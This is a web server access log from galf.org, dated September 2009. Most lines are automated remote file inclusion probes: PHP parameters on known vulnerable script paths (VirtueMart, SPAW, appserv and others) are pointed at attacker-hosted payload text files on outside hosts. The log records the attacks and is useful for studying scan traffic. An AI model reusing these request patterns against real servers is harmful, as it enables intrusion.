92.50.143.90 - - [07/Sep/2009:09:03:40 -0700] "GET /logs/?DOCUMENT_ROOT=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 200 4799 "-" "Mozilla/5.0" "www.galf.org"
92.50.143.90 - - [07/Sep/2009:09:03:40 -0700] "GET /?DOCUMENT_ROOT=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
208.80.195.44 - - [07/Sep/2009:09:03:42 -0700] "GET / HTTP/1.0" 200 1032 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; FDM; MEGAUPLOAD 1.0)" "www.galf.org"
92.50.143.90 - - [07/Sep/2009:09:04:25 -0700] "GET /logs/access_090223.log/?DOCUMENT_ROOT=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
218.38.136.251 - - [07/Sep/2009:09:05:40 -0700] "GET /logs/access.log//?_zb_path=http://www.wdiet.co.kr/img/file/dot.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "galf.org"
218.38.136.251 - - [07/Sep/2009:09:05:41 -0700] "GET /?_zb_path=http://www.wdiet.co.kr/img/file/dot.gif?? HTTP/1.1" 200 1048 "-" "libwww-perl/5.65" "galf.org"
218.38.136.251 - - [07/Sep/2009:09:05:42 -0700] "GET /logs//?_zb_path=http://www.wdiet.co.kr/img/file/dot.gif?? HTTP/1.1" 200 4804 "-" "libwww-perl/5.65" "galf.org"
66.244.236.249 - - [07/Sep/2009:09:08:14 -0700] "GET /logs/access.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://mp30u.com/bbs/skin/zer014/idxx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
66.244.236.249 - - [07/Sep/2009:09:08:43 -0700] "GET /logs/access.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://mp30u.com/bbs/skin/zer014/idxx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
92.50.143.90 - - [07/Sep/2009:09:08:48 -0700] "GET /?INCLUDE_FOLDER=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
92.50.143.90 - - [07/Sep/2009:09:08:48 -0700] "GET /logs/?INCLUDE_FOLDER=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 200 4799 "-" "Mozilla/5.0" "www.galf.org"
92.50.143.90 - - [07/Sep/2009:09:09:23 -0700] "GET /logs/access_090223.log/?INCLUDE_FOLDER=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
222.239.227.142 - - [07/Sep/2009:09:10:23 -0700] "GET /?INCLUDE_FOLDER=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
222.239.227.142 - - [07/Sep/2009:09:10:23 -0700] "GET /logs/access_090309.log/?INCLUDE_FOLDER=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
222.239.227.142 - - [07/Sep/2009:09:10:27 -0700] "GET /logs/?DOCUMENT_ROOT=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 200 4799 "-" "Mozilla/5.0" "www.galf.org"
222.239.227.142 - - [07/Sep/2009:09:10:27 -0700] "GET /?DOCUMENT_ROOT=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
222.239.227.142 - - [07/Sep/2009:09:10:27 -0700] "GET /logs/access_090309.log/?DOCUMENT_ROOT=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
222.239.227.142 - - [07/Sep/2009:09:11:54 -0700] "GET /logs/access_090223.log/?INCLUDE_FOLDER=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
222.239.227.142 - - [07/Sep/2009:09:12:29 -0700] "GET /logs/access_090223.log/?DOCUMENT_ROOT=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.galf.org"
92.50.143.90 - - [07/Sep/2009:09:12:52 -0700] "GET /logs/access_090309.log%20%20/?DOCUMENT_ROOT=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
92.50.143.90 - - [07/Sep/2009:09:13:08 -0700] "GET /logs/access_090309.log%20%20/?INCLUDE_FOLDER=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
92.50.143.90 - - [07/Sep/2009:09:13:12 -0700] "GET /logs/access_090223.log%20%20/?DOCUMENT_ROOT=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
92.50.143.90 - - [07/Sep/2009:09:13:17 -0700] "GET /logs/access_090223.log%20%20/?INCLUDE_FOLDER=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
74.6.22.182 - - [07/Sep/2009:09:14:29 -0700] "GET /logs/access.log HTTP/1.0" 200 453745 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
78.111.80.234 - - [07/Sep/2009:09:16:30 -0700] "GET /skin/zero_vote/ask_password.php?dir=http://www.b92.net/system/files/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
78.111.80.234 - - [07/Sep/2009:09:16:31 -0700] "GET /logs/access.log//skin/zero_vote/ask_password.php?dir=http://www.b92.net/system/files/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
78.111.80.234 - - [07/Sep/2009:09:16:31 -0700] "GET /logs//skin/zero_vote/ask_password.php?dir=http://www.b92.net/system/files/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
199.96.29.70 - - [07/Sep/2009:09:21:04 -0700] "GET /logs/access.log//components/com_forum/download.php?phpbb_root_path=http://indo.home.ro/idbit??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)" "galf.org"
199.96.29.70 - - [07/Sep/2009:09:21:04 -0700] "GET /components/com_forum/download.php?phpbb_root_path=http://indo.home.ro/idbit??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)" "galf.org"
199.96.29.70 - - [07/Sep/2009:09:21:04 -0700] "GET /logs//components/com_forum/download.php?phpbb_root_path=http://indo.home.ro/idbit??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)" "galf.org"
59.150.247.202 - - [07/Sep/2009:09:23:59 -0700] "GET /myevent.php?myevent_path=http://www.artvariety.co.za/scan/zfxid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
59.150.247.202 - - [07/Sep/2009:09:23:59 -0700] "GET /logs//myevent.php?myevent_path=http://www.artvariety.co.za/scan/zfxid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
59.150.247.202 - - [07/Sep/2009:09:24:01 -0700] "GET /logs/access_090323.log%20%20//myevent.php?myevent_path=http://www.artvariety.co.za/scan/zfxid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
59.150.247.202 - - [07/Sep/2009:09:24:07 -0700] "GET /logs/access_090803.log%20%20//myevent.php?myevent_path=http://www.artvariety.co.za/scan/zfxid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
211.189.18.73 - - [07/Sep/2009:09:24:29 -0700] "GET /logs/access.log//admin/business_inc/saveserver.php?thisdir=http://www.jejucasa.com/bbs//include/idi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
211.189.18.73 - - [07/Sep/2009:09:24:29 -0700] "GET /admin/business_inc/saveserver.php?thisdir=http://www.jejucasa.com/bbs//include/idi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
211.189.18.73 - - [07/Sep/2009:09:24:29 -0700] "GET /logs//admin/business_inc/saveserver.php?thisdir=http://www.jejucasa.com/bbs//include/idi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
211.189.18.73 - - [07/Sep/2009:09:24:36 -0700] "GET /logs/access.log//admin/business_inc/saveserver.php?thisdir=http://www.jejucasa.com/bbs//include/idi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
211.189.18.73 - - [07/Sep/2009:09:24:36 -0700] "GET /admin/business_inc/saveserver.php?thisdir=http://www.jejucasa.com/bbs//include/idi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
211.189.18.73 - - [07/Sep/2009:09:24:36 -0700] "GET /logs//admin/business_inc/saveserver.php?thisdir=http://www.jejucasa.com/bbs//include/idi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
211.189.18.73 - - [07/Sep/2009:09:24:46 -0700] "GET /logs/access_090216.log//admin/business_inc/saveserver.php?thisdir=http://www.jejucasa.com/bbs//include/idi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
211.189.18.73 - - [07/Sep/2009:09:24:59 -0700] "GET /logs/access_090216.log//admin/business_inc/saveserver.php?thisdir=http://www.jejucasa.com/bbs//include/idi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
199.120.90.223 - - [07/Sep/2009:09:26:56 -0700] "GET /logs/access.log%20%20//admin/business_inc/saveserver.php?thisdir=http://shanghaisisa.com/skin/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
59.150.247.202 - - [07/Sep/2009:09:27:03 -0700] "GET /myevent.php?myevent_path=http://www.artvariety.co.za/scan/zfxid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
59.150.247.202 - - [07/Sep/2009:09:27:03 -0700] "GET /logs/access_090323.log%20%20//myevent.php?myevent_path=http://www.artvariety.co.za/scan/zfxid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
59.150.247.202 - - [07/Sep/2009:09:27:03 -0700] "GET /logs//myevent.php?myevent_path=http://www.artvariety.co.za/scan/zfxid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
59.150.247.202 - - [07/Sep/2009:09:27:11 -0700] "GET /logs/access_090803.log%20%20//myevent.php?myevent_path=http://www.artvariety.co.za/scan/zfxid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
72.29.82.154 - - [07/Sep/2009:09:27:51 -0700] "GET /citywriter/head.php?path=http://www.compassionbydesign.org/wp-content/idv6.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "galf.org"
72.29.82.154 - - [07/Sep/2009:09:27:51 -0700] "GET /logs/access.log//citywriter/head.php?path=http://www.compassionbydesign.org/wp-content/idv6.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "galf.org"
72.29.82.154 - - [07/Sep/2009:09:27:51 -0700] "GET /logs//citywriter/head.php?path=http://www.compassionbydesign.org/wp-content/idv6.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "galf.org"
222.73.17.7 - - [07/Sep/2009:09:28:36 -0700] "GET /e404.php?DOCUMENT_ROOT=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
222.73.17.7 - - [07/Sep/2009:09:28:36 -0700] "GET /logs/e404.php?DOCUMENT_ROOT=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
222.73.17.7 - - [07/Sep/2009:09:28:53 -0700] "GET /logs/access_090223.log/e404.php?DOCUMENT_ROOT=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
222.73.17.7 - - [07/Sep/2009:09:28:54 -0700] "GET /logs/access_090309.log%20%20/e404.php?DOCUMENT_ROOT=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
222.73.17.7 - - [07/Sep/2009:09:28:54 -0700] "GET /e404.php?DOCUMENT_ROOT=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
222.73.17.7 - - [07/Sep/2009:09:28:54 -0700] "GET /logs/e404.php?DOCUMENT_ROOT=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
222.73.17.7 - - [07/Sep/2009:09:29:16 -0700] "GET /logs/access_090223.log%20%20/e404.php?DOCUMENT_ROOT=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
199.120.90.223 - - [07/Sep/2009:09:29:25 -0700] "GET /logs/access_090504.log%20%20//admin/business_inc/saveserver.php?thisdir=http://shanghaisisa.com/skin/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
211.189.18.73 - - [07/Sep/2009:09:30:04 -0700] "GET /logs/access_090720.log//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.jejucasa.com/bbs//include/idsuper.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
211.189.18.73 - - [07/Sep/2009:09:30:04 -0700] "GET /modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.jejucasa.com/bbs//include/idsuper.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
211.189.18.73 - - [07/Sep/2009:09:30:05 -0700] "GET /logs//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.jejucasa.com/bbs//include/idsuper.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
211.189.18.73 - - [07/Sep/2009:09:30:17 -0700] "GET /modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.jejucasa.com/bbs//include/idsuper.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
117.110.59.2 - - [07/Sep/2009:09:30:38 -0700] "GET /logs//bbshop/shop/main.php?_shop_path=http://www.ferienwohnung-mechthild-jentze.de/administrator/components/com_extcalendar/zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
117.110.59.2 - - [07/Sep/2009:09:30:38 -0700] "GET /logs/access_090223.log//bbshop/shop/main.php?_shop_path=http://www.ferienwohnung-mechthild-jentze.de/administrator/components/com_extcalendar/zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
117.110.59.2 - - [07/Sep/2009:09:30:39 -0700] "GET /bbshop/shop/main.php?_shop_path=http://www.ferienwohnung-mechthild-jentze.de/administrator/components/com_extcalendar/zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
117.110.59.2 - - [07/Sep/2009:09:30:45 -0700] "GET /logs/access_090223.log%20%20//bbshop/shop/main.php?_shop_path=http://www.ferienwohnung-mechthild-jentze.de/administrator/components/com_extcalendar/zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
117.110.59.2 - - [07/Sep/2009:09:32:25 -0700] "GET /logs/access_090803.log%20%20//bbshop/shop/main.php?_shop_path=http://www.ferienwohnung-mechthild-jentze.de/administrator/components/com_extcalendar/zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
117.110.59.2 - - [07/Sep/2009:09:32:25 -0700] "GET /logs/access_090518.log%20%20//bbshop/shop/main.php?_shop_path=http://www.ferienwohnung-mechthild-jentze.de/administrator/components/com_extcalendar/zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
82.151.132.176 - - [07/Sep/2009:09:32:49 -0700] "GET /logs/access_090706.log//appserv/main.php?appserv_root=http://jonrothbard.com/one.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
82.151.132.176 - - [07/Sep/2009:09:32:49 -0700] "GET /logs//appserv/main.php?appserv_root=http://jonrothbard.com/one.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
82.151.132.176 - - [07/Sep/2009:09:32:49 -0700] "GET /appserv/main.php?appserv_root=http://jonrothbard.com/one.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
117.110.59.2 - - [07/Sep/2009:09:33:05 -0700] "GET /logs/access_090316.log%20%20//bbshop/shop/main.php?_shop_path=http://www.ferienwohnung-mechthild-jentze.de/administrator/components/com_extcalendar/zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
117.110.59.2 - - [07/Sep/2009:09:33:06 -0700] "GET /logs/access_090302.log%20%20//bbshop/shop/main.php?_shop_path=http://www.ferienwohnung-mechthild-jentze.de/administrator/components/com_extcalendar/zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
82.151.132.176 - - [07/Sep/2009:09:33:15 -0700] "GET /logs/access_090706.log%20%20//appserv/main.php?appserv_root=http://jonrothbard.com/one.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
199.120.90.223 - - [07/Sep/2009:09:33:30 -0700] "GET /logs/access.log%20%20//admin/business_inc/saveserver.php?thisdir=http://shanghaisisa.com/skin/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
222.236.47.188 - - [07/Sep/2009:09:33:46 -0700] "GET /historytemplate.php?cms[support]=1&cms[tngpath]=http://www.gswheel.com/gswheel_system_bak/skin/board/anystyle/thumbs/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
222.236.47.188 - - [07/Sep/2009:09:33:46 -0700] "GET /logs/historytemplate.php?cms[support]=1&cms[tngpath]=http://www.gswheel.com/gswheel_system_bak/skin/board/anystyle/thumbs/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
222.236.47.188 - - [07/Sep/2009:09:33:46 -0700] "GET /logs/access_090316.log/historytemplate.php?cms[support]=1&cms[tngpath]=http://www.gswheel.com/gswheel_system_bak/skin/board/anystyle/thumbs/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
222.236.47.188 - - [07/Sep/2009:09:33:49 -0700] "GET /logs/access_090316.log/historytemplate.php?cms[support]=1&cms[tngpath]=http://www.gswheel.com/gswheel_system_bak/skin/board/anystyle/thumbs/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
222.236.47.188 - - [07/Sep/2009:09:33:49 -0700] "GET /historytemplate.php?cms[support]=1&cms[tngpath]=http://www.gswheel.com/gswheel_system_bak/skin/board/anystyle/thumbs/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
222.236.47.188 - - [07/Sep/2009:09:33:49 -0700] "GET /logs/historytemplate.php?cms[support]=1&cms[tngpath]=http://www.gswheel.com/gswheel_system_bak/skin/board/anystyle/thumbs/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
82.151.132.176 - - [07/Sep/2009:09:34:26 -0700] "GET /logs/access.log%20%20//appserv/main.php?appserv_root=http://jonrothbard.com/one.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
204.3.129.73 - - [07/Sep/2009:09:34:38 -0700] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.gsg-duesseldorf.de/assets/snippets/reflect/id.txt?? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "galf.org"
204.3.129.73 - - [07/Sep/2009:09:34:40 -0700] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.gsg-duesseldorf.de/assets/snippets/reflect/id.txt?? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "galf.org"
204.3.129.73 - - [07/Sep/2009:09:34:40 -0700] "GET /logs/access.log%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.gsg-duesseldorf.de/assets/snippets/reflect/id.txt?? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "galf.org"
117.110.59.2 - - [07/Sep/2009:09:35:09 -0700] "GET /logs/access_090223.log//bbshop/shop/main.php?_shop_path=http://www.ferienwohnung-mechthild-jentze.de/administrator/components/com_extcalendar/zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
117.110.59.2 - - [07/Sep/2009:09:35:09 -0700] "GET /bbshop/shop/main.php?_shop_path=http://www.ferienwohnung-mechthild-jentze.de/administrator/components/com_extcalendar/zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
117.110.59.2 - - [07/Sep/2009:09:35:09 -0700] "GET /logs//bbshop/shop/main.php?_shop_path=http://www.ferienwohnung-mechthild-jentze.de/administrator/components/com_extcalendar/zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
117.110.59.2 - - [07/Sep/2009:09:35:13 -0700] "GET /logs/access_090223.log%20%20//bbshop/shop/main.php?_shop_path=http://www.ferienwohnung-mechthild-jentze.de/administrator/components/com_extcalendar/zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
199.120.90.223 - - [07/Sep/2009:09:35:29 -0700] "GET /logs/access_090504.log%20%20//admin/business_inc/saveserver.php?thisdir=http://shanghaisisa.com/skin/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
117.110.59.2 - - [07/Sep/2009:09:36:24 -0700] "GET /logs/access_090803.log%20%20//bbshop/shop/main.php?_shop_path=http://www.ferienwohnung-mechthild-jentze.de/administrator/components/com_extcalendar/zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
117.110.59.2 - - [07/Sep/2009:09:36:29 -0700] "GET /logs/access_090518.log%20%20//bbshop/shop/main.php?_shop_path=http://www.ferienwohnung-mechthild-jentze.de/administrator/components/com_extcalendar/zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
117.110.59.2 - - [07/Sep/2009:09:36:37 -0700] "GET /logs/access_090316.log%20%20//bbshop/shop/main.php?_shop_path=http://www.ferienwohnung-mechthild-jentze.de/administrator/components/com_extcalendar/zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
211.189.18.73 - - [07/Sep/2009:09:36:45 -0700] "GET /modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://www.jejucasa.com/bbs//include/idsuper.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
117.110.59.2 - - [07/Sep/2009:09:37:12 -0700] "GET /logs/access_090302.log%20%20//bbshop/shop/main.php?_shop_path=http://www.ferienwohnung-mechthild-jentze.de/administrator/components/com_extcalendar/zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
74.6.22.182 - - [07/Sep/2009:09:37:13 -0700] "GET /logs/access_090810.log HTTP/1.0" 200 4806214 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
211.189.18.73 - - [07/Sep/2009:09:37:21 -0700] "GET /logs/access_090427.log//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.jejucasa.com/bbs//include/idsuper.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
209.61.244.6 - - [07/Sep/2009:09:38:04 -0700] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://megabyte.hr//images/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.galf.org"
209.61.244.6 - - [07/Sep/2009:09:38:04 -0700] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://megabyte.hr//images/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.galf.org"
58.61.164.40 - - [07/Sep/2009:09:38:37 -0700] "GET /robots.txt HTTP/1.1" 404 275 "http://www.galf.org/robots.txt" "Sosospider+(+http://help.soso.com/webspider.htm)" "www.galf.org"
209.61.244.6 - - [07/Sep/2009:09:40:18 -0700] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://megabyte.hr//images/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.galf.org"
209.61.244.6 - - [07/Sep/2009:09:40:18 -0700] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://megabyte.hr//images/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.galf.org"
211.189.18.73 - - [07/Sep/2009:09:41:12 -0700] "GET /logs/access_090720.log//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.jejucasa.com/bbs//include/idi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
211.189.18.73 - - [07/Sep/2009:09:41:12 -0700] "GET /logs//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.jejucasa.com/bbs//include/idi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
211.189.18.73 - - [07/Sep/2009:09:41:12 -0700] "GET /modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.jejucasa.com/bbs//include/idi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
211.189.18.73 - - [07/Sep/2009:09:41:13 -0700] "GET /modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://shanghaisisa.com/chboard/images/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
211.189.18.73 - - [07/Sep/2009:09:41:13 -0700] "GET /logs//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://shanghaisisa.com/chboard/images/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
211.189.18.73 - - [07/Sep/2009:09:41:13 -0700] "GET /logs/access_090720.log//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://shanghaisisa.com/chboard/images/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
211.189.18.73 - - [07/Sep/2009:09:41:16 -0700] "GET /modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://shanghaisisa.com/chboard/images/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
211.189.18.73 - - [07/Sep/2009:09:41:16 -0700] "GET /logs//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://shanghaisisa.com/chboard/images/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
211.189.18.73 - - [07/Sep/2009:09:41:20 -0700] "GET /logs//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.jejucasa.com/bbs//include/idi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
211.189.18.73 - - [07/Sep/2009:09:41:27 -0700] "GET /logs/access_090525.log//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://shanghaisisa.com/chboard/images/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
222.239.227.142 - - [07/Sep/2009:09:41:54 -0700] "GET /logs/access_090223.log/?DOCUMENT_ROOT=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
222.239.227.142 - - [07/Sep/2009:09:41:54 -0700] "GET /logs/?INCLUDE_FOLDER=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 200 4799 "-" "Mozilla/5.0" "www.galf.org"
222.239.227.142 - - [07/Sep/2009:09:41:54 -0700] "GET /?INCLUDE_FOLDER=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
222.239.227.142 - - [07/Sep/2009:09:41:54 -0700] "GET /logs/access_090223.log/?INCLUDE_FOLDER=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
